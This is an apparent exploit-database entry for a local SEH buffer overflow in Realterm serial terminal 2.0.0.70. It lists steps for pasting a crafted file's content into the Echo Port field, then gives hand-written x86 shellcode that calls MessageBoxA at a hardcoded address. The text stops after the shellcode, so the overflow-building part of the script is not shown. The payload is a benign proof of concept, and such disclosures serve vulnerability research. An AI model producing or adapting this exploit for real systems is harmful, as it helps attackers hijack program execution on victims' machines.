Realterm serial terminal 2.0.0.70 echo port buffer overflow (seh) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2019-02-21 | Type: local | Platform: windows
# 1.- Run the python script it will create a new file "carbonara.txt"
# 2.- Copy the content of the new file 'carbonara.txt' to clipboard
# 3.- Open realterm.exe
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or
# 8.- Box!
import socket
import struct
'''
badchars: 0x20,0x0a
arwin.exe user32.dll MessageBoxA
arwin - win32 address resolution program - by steve hanna - v.01
MessageBoxA is located at 0x747cfdae in user32.dll
'''
shellcode = (
"\x33\xc0" # XOR EAX,EAX
"\x50" # PUSH EAX => padding for lpCaption
"\x68\x7a\x6f\x21\x21" # PUSH "zo!!"
"\x68\x61\x76\x61\x6e" # PUSH "avan"
"\x8B\xCC" # MOV ECX,ESP => PTR to lpCaption
"\x50" # PUSH EAX => padding for lpText
"\x68\x6e\x7a\x6f\x21" # PUSH "nzo!"
"\x68\x61\x76\x61\x21" # PUSH "ava!"
"\x8B\xD4" # MOV EDX,ESP => PTR to lpText
"\x50" # PUSH EAX - uType=0x0
"\x51" # PUSH ECX - lpCaption
"\x52" # PUSH EDX - lpText
"\x50" # PUSH EAX - hWnd=0x0
"\xBE\xae\xfd\x7c\x74" # MOV ESI,USER32.MessageBoxA <<< hardcoded address
"\xFF\xD6") # CALL ESI